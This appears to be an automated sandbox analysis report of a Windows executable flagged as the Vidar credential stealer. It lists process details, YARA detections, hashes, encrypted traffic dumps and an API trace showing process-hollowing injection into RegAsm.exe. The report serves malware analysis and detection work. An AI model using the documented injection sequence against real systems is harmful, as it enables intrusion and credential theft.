                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: 29 e9 67 04 44 cb c0 e1 aa 06 c1 7f 0b 0f 71 8e 31 e2 d8 93 fc f9 79 23 df 84 15 ae 82 af e8 60 50 3c 25 90 b1 b0 4a b3 40 26 0b 02 cf 0c 30 a9 87 06 9b 9c c1 10 fb 73 e8 18 53 60 e6 9a e3 33 92 dc b9 d2 c5 43 89 15 7c 46 02 30 cf 53 7c 77 12 37 27 f1 9f 6e c3 08 0b 59 26 f1 12 9a 7a cb 55 04 87 48 f4 04 13 92 3d 5a 1c 47 b4 81 7c 67 3d 02 c9 06 15 16 fb 78 6b 0c 09 60 09 0d b7 80 68 39 e9 a8 65 c9 b4 9a 90 00 62 6c 9e 41 c7 5e c2 08 c9 46 b9 2f ba a4 76 b6 e6 74 7f e5 90 a2 52 c1 57 7a 8a 1b fd 4d a4 64 bf 25 78 5f aa 9b 76 e7 af 99 23 46 51 12 2a 85 a7 6e 22 e8 86 00 4b 57 63 fe 1d b7 20 8d 06 19 5d dd 27 80 6b a2 39 24 8d 40 d3 8f 38 70 1f 2a 01 2e b2 fe 92 a8 1a c5 f8 1f f6 74 c2 1f 9b 15 3b 94 22 4e 5d 60 5b 48 2a ea 33 b9 88 c5 10 79 87 ae bd bc b7
                                                                                                      Data Ascii: )gDq1y#`P<%J@&0sS`3C|F0S|w7'nY&zUH=ZG|g=xk`h9eblA^F/vtRWzMd%x_v#FQ*n"KWc ]'k9$@8p*.t;"N]`[H*3y
                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: fc 9b cf 45 f9 61 e3 65 71 bb 52 77 76 f9 01 61 ee 6c cd 55 03 42 b2 92 41 d5 40 03 3b fd a7 8d db df 78 0d 90 2e 78 b9 57 34 64 76 f1 01 aa cf b5 6e ca f8 6f 25 1f 2a d4 72 fb 3d 73 73 e3 97 e0 c2 76 a4 39 f8 54 6f fe 9b 90 3c 0e ec 80 86 fb cb fd 59 6c c9 13 88 d2 a4 66 46 1c c9 52 4c 2e e2 ec 14 0b 41 30 61 3e 98 e2 1d a2 9e b3 80 5b cb df 71 9e 15 c2 d0 08 7c 73 d6 65 14 4f 18 32 5e f9 80 d5 9c 30 88 f2 9e d0 17 4e 99 e7 ca 82 21 dd b1 5c 07 0b c7 dc 19 3f 0f e8 43 c4 cd 96 27 fe 39 59 a2 4e 0d b7 f5 d5 1e 12 49 af f9 e3 d1 e7 1e 68 4a ea 16 47 ba 78 9e c0 e1 46 48 29 6b ac c9 29 40 44 68 6c 40 12 41 f0 db 27 15 a8 b2 0a 56 f9 f6 64 a8 a3 40 c3 16 25 8c 9a 8c 89 ee 0d 10 a8 40 f8 30 9f 71 fb 47 2b bb ca a1 ce b2 aa 46 bc b7 35 85 6b bd 54 8b 8b d9 c9
                                                                                                      Data Ascii: EaeqRwvalUBA@;x.xW4dvno%*r=ssv9To<YlfFRL.A0a>[q|seO2^0N!\?C'9YNIhJGxFH)k)@Dhl@A'Vd@%@0qG+F5kT
                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: 4f d2 b1 20 a6 2b ff 92 3e ed d9 5c 12 82 65 d5 20 04 cf 4c 41 62 74 b9 2f c5 8f 60 78 f5 d3 76 cd 3e 1c 42 c9 50 f0 07 55 5b e5 70 c1 aa f1 be c7 58 d8 70 14 e1 b9 bd c9 ca e1 52 f3 a7 0c 8e 69 9e cd d8 ed fa 0f 90 57 ec 80 9c 44 57 df ea e7 70 4d d4 27 b0 9b 62 7e 0e ff e5 2c 65 0f 5c d7 bf c7 2a 9b 09 7b 72 0c 9b fe b1 ef 88 05 e1 9d 66 1e 8d cc 9a 4d 93 bb 36 ba 70 31 3c 66 2e e5 46 1d f5 0b eb b2 0c 30 8e 6b e5 37 14 20 6a d9 1d 3a 92 1e 24 d7 b7 33 e3 9d a1 32 1d fd 69 4a c6 07 9f ca bb 17 d8 97 26 e5 cb 1e 18 42 f3 0b cc 5f 89 14 b5 62 99 54 09 5d 0f 66 77 1e 5d 37 d3 99 42 84 49 e2 45 56 1e 63 c0 77 3c ce d1 9d 4a 28 3d b2 35 72 38 e9 ab 3e 5c ee 95 cb df 16 75 4d 1d 42 77 8a 94 fe 42 0d bc df bc 91 6f 0a b5 c7 1d 44 05 fd 00 64 9f 87 00 eb a3 db
                                                                                                      Data Ascii: O +>\e LAbt/`xv>BPU[pXpRiWDWpM'b~,e\*{rfM6p1<f.F0k7 j:$32iJ&B_bT]fw]7BIEVcw<J(=5r8>\uMBwBoDd
                                                                                                      2024-09-26 17:06:07 UTC8000INData Raw: 84 df 03 6a b4 83 3c a2 8d 9f df 03 18 76 b5 b3 73 92 1c 49 a7 e0 f4 74 89 d5 b1 90 26 ab 47 40 4a 37 13 54 81 f2 79 82 ec f5 26 2e e0 a3 d2 a1 b0 43 e0 d0 31 d3 4f e0 56 5d fd 6a f1 51 d9 fd e7 70 e9 28 5d 93 bb 56 ae c4 d7 bf 72 00 73 39 5d 00 76 f2 e9 19 b2 b1 fe d2 c6 01 68 4e 4b d1 99 8c e4 2e 73 01 93 e6 21 e8 97 ef 61 42 97 67 fd 4e c0 fc e0 ea 07 2c 28 60 15 58 b4 a9 fe 6e c1 4c 75 5a 72 75 c4 39 ec 40 61 6b 4a 79 51 43 1c 75 5d d0 dc ae 9d 1c 13 b2 f8 57 10 24 ab 33 5f 36 03 c7 e4 f9 2c 8d 0f d8 37 8f 1f ba fc 92 85 86 a1 83 8a ea 38 9b a3 52 1f db fd 32 c7 57 c9 c3 63 e4 81 2a 0c de e8 d4 bd 53 f1 eb 09 56 a6 0f 51 79 03 13 e3 46 2d 5f 16 a8 0a e1 bc 7d 83 db 29 a1 fa 77 1a 84 fc c7 b8 a8 0b 6b c1 6f 51 13 f0 24 62 6c 31 fe d9 41 d1 de e7 ea 0d
                                                                                                      Data Ascii: j<vsIt&G@J7Ty&.C1OV]jQp(]Vrs9]vhNK.s!aBgN,(`XnLuZru9@akJyQCu]W$3_6,78R2Wc*SVQyF-_})wkoQ$bl1A
                                                                                                      2024-09-26 17:06:07 UTC8000INData Raw: 98 88 95 12 39 83 a7 08 39 97 43 6f e4 c5 55 c9 0c ee 6f 08 19 a6 1c 65 c7 6d 29 73 ce 02 ed 72 21 15 cd e2 dd e2 9c 1d 77 5d 0b b5 4b f0 4c 7a 79 8f ea ce ad a1 ca 06 94 58 02 a4 1f 36 e1 2d 98 73 71 6a bd f4 07 63 ab 1f 96 1b 4d c4 13 f4 25 24 4b a9 d2 c7 e6 17 17 72 e5 d5 1e a3 0e d8 83 19 46 08 2f 1d 3e ab fa c2 12 5d 84 dc 7b 6c 09 cc e8 57 0e 5d 17 4a 74 68 8e 99 93 6d b8 36 cf 52 54 3f cc d4 16 f9 31 e2 d5 29 06 30 2f 77 35 36 80 9b 23 e9 8e 72 8b 27 d8 75 f3 17 bd b5 0a 3a f9 eb c2 c7 8b 6f 6b 57 42 6e 6e 23 d5 bc 35 5c 6a 30 23 0b 6a df 2e 64 76 54 35 15 e4 c4 83 89 be af 4b 42 64 49 83 02 e3 7c 8c 42 f2 4e 37 10 71 5b db 0e 89 3a 84 ce 84 c5 3f 0f a9 57 b5 f4 db f3 8a 5f e2 60 5b 39 74 d7 61 e3 ff 4f a5 35 fb 5a b7 82 2d 09 3f 88 93 e8 da 4d 87
                                                                                                      Data Ascii: 99CoUoem)sr!w]KLzyX6-sqjcM%$KrF/>]{lW]Jthm6RT?1)0/w56#r'u:okWBnn#5\j0#j.dvT5KBdI|BN7q[:?W_`[9taO5Z-?M
                                                                                                      2024-09-26 17:06:07 UTC8000INData Raw: 1a 06 41 2d 9f a0 a9 d8 6d cc d1 be 4a 46 7b 32 c2 98 39 d3 d1 00 02 a7 6b ed 0f 4a c5 cb d5 af 51 d2 6e 1e ba af 46 9b 31 4f ba ca 45 60 a2 08 f9 79 ba 8a 67 19 f6 40 42 68 83 da b4 cd d5 9b 0c ff eb cf d4 ce ad 88 26 a0 bd 98 31 b7 1d 57 b7 25 74 06 d4 3f 08 e6 6f 1c af 38 03 a4 14 59 43 cd 3b 2f 60 d9 80 c8 27 f3 99 b0 02 9f 3c af e0 8b 97 29 92 eb 29 b3 54 52 30 87 e8 ea 13 5f de 19 aa a5 9c 3b d7 82 b6 49 80 67 76 79 66 ad d2 69 d5 0e 8b ed 00 f7 55 6c ce 7d f3 9a 11 5f 38 06 9d 04 e0 aa 7c b5 48 3d 51 05 fc a3 43 a2 2e 98 99 80 07 3a a3 b8 63 df be 39 64 7e 1e 75 32 03 29 16 79 4c 1b ef 3d eb a1 c7 1f da e7 02 0f f5 71 c9 93 2d 52 50 b1 00 bd 83 25 c3 75 72 8b 38 be 60 ed 71 c8 99 1f 35 00 df 27 b1 b0 d2 ee dc aa e8 16 20 3a 40 45 8d 59 d3 32 9b b8
                                                                                                      Data Ascii: A-mJF{29kJQnF1OE`yg@Bh&1W%t?o8YC;/`'<))TR0_;IgvyfiUl}_8|H=QC.:c9d~u2)yL=q-RP%ur8`q5' :@EY2


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:13:05:04
                                                                                                      Start date:26/09/2024
                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                      Imagebase:0xbb0000
                                                                                                      File size:413'224 bytes
                                                                                                      MD5 hash:2CCE29D734EA1D227B338834698E2DE4
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:13:05:04
                                                                                                      Start date:26/09/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:13:05:04
                                                                                                      Start date:26/09/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0xd80000
                                                                                                      File size:65'440 bytes
                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:35.7%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:33.3%
                                                                                                        Total number of Nodes:21
                                                                                                        Total number of Limit Nodes:0
                                                                                                        execution_graph 456 1240988 457 124099e 456->457 458 1240abb 457->458 461 1241220 457->461 465 1241218 457->465 462 124126b VirtualProtectEx 461->462 464 12412af 462->464 464->458 466 124126b VirtualProtectEx 465->466 468 12412af 466->468 468->458 476 1240978 477 124099e 476->477 478 1240abb 477->478 479 1241220 VirtualProtectEx 477->479 480 1241218 VirtualProtectEx 477->480 479->478 480->478 469 2fe2131 470 2fe2169 469->470 470->470 471 2fe2277 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 470->471 471->470 472 2fe2346 WriteProcessMemory 471->472 473 2fe238b 472->473 474 2fe23cd WriteProcessMemory Wow64SetThreadContext ResumeThread 473->474 475 2fe2390 WriteProcessMemory 473->475 475->473

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_01240224 1 Function_012410A5 35 Function_01240260 1->35 2 Function_01241220 3 Function_012400A0 4 Function_0124012C 5 Function_01240528 5->35 6 Function_012401A8 7 Function_01240B2A 8 Function_01240534 8->35 9 Function_012401B4 10 Function_01240234 11 Function_01240BB0 12 Function_012400B0 13 Function_012400BC 14 Function_0124013C 15 Function_012404BD 16 Function_012404B9 17 Function_01240100 18 Function_01240080 19 Function_0124010C 20 Function_0124048F 21 Function_01240988 21->2 21->5 21->7 21->8 27 Function_0124051C 21->27 30 Function_01241218 21->30 58 Function_01240C40 21->58 59 Function_01240540 21->59 22 Function_01240188 23 Function_01240208 24 Function_01240214 25 Function_01240090 26 Function_01240510 28 Function_0124011C 29 Function_01240198 31 Function_012400E4 32 Function_01240165 33 Function_01240465 34 Function_01240060 36 Function_01240461 37 Function_012412E1 38 Function_012401EC 39 Function_0124046D 40 Function_012408E8 41 Function_01240469 42 Function_02FE2131 43 Function_01240475 44 Function_012404F5 45 Function_01240070 46 Function_012400F0 47 Function_01240471 48 Function_012404F1 49 Function_01240178 50 Function_012401F8 51 Function_01240978 51->2 51->5 51->7 51->8 51->27 51->30 51->58 51->59 52 Function_01240479 53 Function_012404F9 54 Function_01240244 55 Function_01240444 56 Function_01240844 57 Function_012411C6 58->35 60 Function_012401C0 61 Function_012404C1 62 Function_012411CC 62->35 63 Function_0124004D 64 Function_0124054D 65 Function_02FE1D17 66 Function_01240148 67 Function_012400C8 68 Function_01240848 69 Function_01240154 70 Function_012400D4 71 Function_01240254 72 Function_01240555 73 Function_01241056 74 Function_012404D7 75 Function_01240450 76 Function_02FE1F8A 77 Function_01240551 78 Function_0124105C 78->35 79 Function_0124045D 80 Function_012408D8 81 Function_01240559

                                                                                                        Executed Functions

                                                                                                        Function 02FE2131 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02FE20A3,02FE2093), ref: 02FE22A0
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02FE22B3
                                                                                                        • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 02FE22D1
                                                                                                        • ReadProcessMemory.KERNELBASE(0000008C,?,02FE20E7,00000004,00000000), ref: 02FE22F5
                                                                                                        • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02FE2320
                                                                                                        • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02FE2378
                                                                                                        • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 02FE23C3
                                                                                                        • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02FE2401
                                                                                                        • Wow64SetThreadContext.KERNEL32(00000098,02E80000), ref: 02FE243D
                                                                                                        • ResumeThread.KERNELBASE(00000098), ref: 02FE244C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058561662.0000000002FE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2fe1000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                        • API String ID: 2687962208-1257834847
                                                                                                        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                        • Instruction ID: 9307c95a53ebb09c2fc5129678f9f70d69314f496a2ccf48796e7242b2a88b92
                                                                                                        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                        • Instruction Fuzzy Hash: 94B1D67664024AAFDB60CF68CC80BDA77A9FF88754F158524EA08AB341D774FA418B94
                                                                                                        Function 01240C40 Relevance: .3, Instructions: 322COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 37 1240c40-1240c9b 40 1240d07-1240d15 37->40 41 1240c9d-1240cb6 37->41 42 1240da4-1240db7 40->42 43 1240d1b 40->43 50 1240f0d-1240f87 41->50 55 1240cbc-1240cdd 41->55 45 1240f03-1240f0a 42->45 46 1240dbd-1240dc6 42->46 47 1240d1e-1240d23 43->47 48 1240dcf-1240dda 46->48 49 1240dc8-1240dce 46->49 47->50 51 1240d29-1240d39 47->51 48->50 53 1240de0-1240dec 48->53 49->48 66 1240f89-1240fae 50->66 67 1240fdb-1241027 50->67 51->50 54 1240d3f-1240d4b 51->54 56 1240df5-1240dfc 53->56 57 1240dee-1240df4 53->57 59 1240d54-1240d5b 54->59 60 1240d4d-1240d53 54->60 55->50 62 1240ce3-1240cf1 55->62 56->50 64 1240e02-1240e0c 56->64 57->56 59->50 61 1240d61-1240d6b 59->61 60->59 61->50 65 1240d71-1240d7b 61->65 62->50 68 1240cf7-1240d05 62->68 64->50 69 1240e12-1240e1c 64->69 65->50 70 1240d81-1240d87 65->70 66->67 76 1240fb0-1240fb2 66->76 83 1241030-1241068 67->83 84 1241029-124102f 67->84 68->40 68->41 69->50 71 1240e22-1240e28 69->71 70->50 72 1240d8d-1240d9e 70->72 71->50 75 1240e2e-1240e3a 71->75 72->42 72->47 75->50 77 1240e40-1240e51 75->77 81 1240fb4-1240fbe 76->81 82 1240fd5-1240fd8 76->82 79 1240e53-1240e59 77->79 80 1240e5a-1240eb4 77->80 79->80 102 1240ee5-1240eea 80->102 103 1240eb6-1240ec0 80->103 85 1240fc0 81->85 86 1240fc2-1240fd1 81->86 82->67 93 1241078 83->93 94 124106a-124106e 83->94 84->83 85->86 86->86 88 1240fd3 86->88 88->82 98 1241079 93->98 94->93 96 1241070-1241073 call 1240260 94->96 96->93 98->98 107 1240ef1-1240efd 102->107 103->102 104 1240ec2-1240eda 103->104 104->102 105 1240edc-1240ee3 104->105 105->107 107->45 107->46
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058185728.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1240000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8758e7de542619cbb0508c14e4eebf07e790723f3f0cb779fa62cb89b692f7e1
                                                                                                        • Instruction ID: 56b1851b32229aa6e95b210ba5c175c94082333ab98acfea80777101e796a6de
                                                                                                        • Opcode Fuzzy Hash: 8758e7de542619cbb0508c14e4eebf07e790723f3f0cb779fa62cb89b692f7e1
                                                                                                        • Instruction Fuzzy Hash: 63D1B070A142598FCB1ACFA8C480AEDFBF2BF58314F288569E555E7256C734AC81CF94
                                                                                                        Function 01241218 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 23 1241218-12412ad VirtualProtectEx 26 12412b4-12412d5 23->26 27 12412af 23->27 27->26
                                                                                                        APIs
                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 012412A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058185728.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1240000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 33928debe9a39c8c85fb1d94b26b68cc6540af9f5d109dab6635d6ebc326c088
                                                                                                        • Instruction ID: fc2b5201724ab9d246a3005d36b328344fddda30f950accbe42c7076fae9a79f
                                                                                                        • Opcode Fuzzy Hash: 33928debe9a39c8c85fb1d94b26b68cc6540af9f5d109dab6635d6ebc326c088
                                                                                                        • Instruction Fuzzy Hash: EE2134B1D102599FCB14CFAAD880AEEBBF4FF88320F10842EE919A3250C7355944CFA1
                                                                                                        Function 01241220 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 30 1241220-12412ad VirtualProtectEx 33 12412b4-12412d5 30->33 34 12412af 30->34 34->33
                                                                                                        APIs
                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 012412A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2058185728.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1240000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: d569836423ed95d5f6ef2142db1c2566a7e4ea3240f599664170c4e6f85b0937
                                                                                                        • Instruction ID: 890c0ec022fd4193041f33c27c31501420ea6a259d95a50d1ff92a09f931f4a8
                                                                                                        • Opcode Fuzzy Hash: d569836423ed95d5f6ef2142db1c2566a7e4ea3240f599664170c4e6f85b0937
                                                                                                        • Instruction Fuzzy Hash: 492113B1D002599FDB10DFAAC980ADEFBF4FF48310F10842AE919A3250C7756940DBA1

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:3.8%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:30
                                                                                                        execution_graph 78471 6c0cb8ae 78472 6c0cb8ba ___scrt_is_nonwritable_in_current_image 78471->78472 78473 6c0cb8e3 dllmain_raw 78472->78473 78474 6c0cb8de 78472->78474 78483 6c0cb8c9 78472->78483 78475 6c0cb8fd dllmain_crt_dispatch 78473->78475 78473->78483 78484 6c0abed0 DisableThreadLibraryCalls LoadLibraryExW 78474->78484 78475->78474 78475->78483 78477 6c0cb91e 78478 6c0cb94a 78477->78478 78485 6c0abed0 DisableThreadLibraryCalls LoadLibraryExW 78477->78485 78479 6c0cb953 dllmain_crt_dispatch 78478->78479 78478->78483 78481 6c0cb966 dllmain_raw 78479->78481 78479->78483 78481->78483 78482 6c0cb936 dllmain_crt_dispatch dllmain_raw 78482->78478 78484->78477 78485->78482 78486 6c0cb694 78487 6c0cb6a0 ___scrt_is_nonwritable_in_current_image 78486->78487 78516 6c0caf2a 78487->78516 78489 6c0cb6a7 78490 6c0cb796 78489->78490 78491 6c0cb6d1 78489->78491 78495 6c0cb6ac ___scrt_is_nonwritable_in_current_image 78489->78495 78533 6c0cb1f7 IsProcessorFeaturePresent 78490->78533 78520 6c0cb064 78491->78520 78494 6c0cb79d ___scrt_is_nonwritable_in_current_image 78498 6c0cb7b3 ___scrt_uninitialize_crt __RTC_Initialize 78494->78498 78501 6c0cb828 78494->78501 78502 6c0cb7d2 78494->78502 78496 6c0cb6e0 __RTC_Initialize 78496->78495 78523 6c0cbf89 InitializeSListHead 78496->78523 78499 6c0cb6ee ___scrt_initialize_default_local_stdio_options 78500 6c0cb6f3 _initterm_e 78499->78500 78500->78495 78503 6c0cb708 78500->78503 78504 6c0cb1f7 ___scrt_fastfail 6 API calls 78501->78504 78537 6c0cb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 78502->78537 78524 6c0cb072 78503->78524 78507 6c0cb82f 78504->78507 78511 6c0cb86e dllmain_crt_process_detach 78507->78511 78512 6c0cb83b 78507->78512 78508 6c0cb7d7 78538 6c0cbf95 __std_type_info_destroy_list 78508->78538 78509 6c0cb70d 78509->78495 78513 6c0cb711 _initterm 78509->78513 78515 6c0cb840 78511->78515 78514 6c0cb860 dllmain_crt_process_attach 78512->78514 78512->78515 78513->78495 78514->78515 78517 6c0caf33 78516->78517 78539 6c0cb341 IsProcessorFeaturePresent 78517->78539 78519 6c0caf3f ___scrt_uninitialize_crt 78519->78489 78540 6c0caf8b 78520->78540 78522 6c0cb06b 78522->78496 78523->78499 78525 6c0cb077 ___scrt_release_startup_lock 78524->78525 78526 6c0cb07b 78525->78526 78527 6c0cb082 78525->78527 78550 6c0cb341 IsProcessorFeaturePresent 78526->78550 78530 6c0cb087 _configure_narrow_argv 78527->78530 78529 6c0cb080 78529->78509 78531 6c0cb095 _initialize_narrow_environment 78530->78531 78532 6c0cb092 78530->78532 78531->78529 78532->78509 78534 6c0cb20c ___scrt_fastfail 78533->78534 78535 6c0cb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 78534->78535 78536 6c0cb302 ___scrt_fastfail 78535->78536 78536->78494 78537->78508 78538->78498 78539->78519 78541 6c0caf9e 78540->78541 78542 6c0caf9a 78540->78542 78543 6c0cb028 78541->78543 78545 6c0cafab ___scrt_release_startup_lock 78541->78545 78542->78522 78544 6c0cb1f7 ___scrt_fastfail 6 API calls 78543->78544 78546 6c0cb02f 78544->78546 78547 6c0cafb8 _initialize_onexit_table 78545->78547 78548 6c0cafd6 78545->78548 78547->78548 78549 6c0cafc7 _initialize_onexit_table 78547->78549 78548->78522 78549->78548 78550->78529 78551 6c093060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 78556 6c0cab2a 78551->78556 78555 6c0930db 78560 6c0cae0c _crt_atexit _register_onexit_function 78556->78560 78558 6c0930cd 78559 6c0cb320 5 API calls ___raise_securityfailure 78558->78559 78559->78555 78560->78558 78561 6c0935a0 78562 6c0935c4 InitializeCriticalSectionAndSpinCount getenv 78561->78562 78577 6c093846 __aulldiv 78561->78577 78564 6c0938fc strcmp 78562->78564 78568 6c0935f3 __aulldiv 78562->78568 78566 6c093912 strcmp 78564->78566 78564->78568 78565 6c0938f4 78566->78568 78567 6c0935f8 QueryPerformanceFrequency 78567->78568 78568->78567 78569 6c093622 _strnicmp 78568->78569 78571 6c093944 _strnicmp 78568->78571 78573 6c09395d 78568->78573 78574 6c093664 GetSystemTimeAdjustment 78568->78574 78576 6c09375c 78568->78576 78569->78568 78569->78571 78570 6c09376a QueryPerformanceCounter EnterCriticalSection 78572 6c0937b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 78570->78572 78570->78576 78571->78568 78571->78573 78575 6c0937fc LeaveCriticalSection 78572->78575 78572->78576 78574->78568 78575->78576 78575->78577 78576->78570 78576->78572 78576->78575 78576->78577 78578 6c0cb320 5 API calls ___raise_securityfailure 78577->78578 78578->78565 78579 6c0ac930 GetSystemInfo VirtualAlloc 78580 6c0ac9a3 GetSystemInfo 78579->78580 78581 6c0ac973 78579->78581 78583 6c0ac9d0 78580->78583 78584 6c0ac9b6 78580->78584 78595 6c0cb320 5 API calls ___raise_securityfailure 78581->78595 78583->78581 78585 6c0ac9d8 VirtualAlloc 78583->78585 78584->78583 78587 6c0ac9bd 78584->78587 78588 6c0ac9ec 78585->78588 78589 6c0ac9f0 78585->78589 78586 6c0ac99b 78587->78581 78590 6c0ac9c1 VirtualFree 78587->78590 78588->78581 78596 6c0ccbe8 GetCurrentProcess TerminateProcess 78589->78596 78590->78581 78595->78586 78597 6c0cb830 78598 6c0cb86e dllmain_crt_process_detach 78597->78598 78599 6c0cb83b 78597->78599 78601 6c0cb840 78598->78601 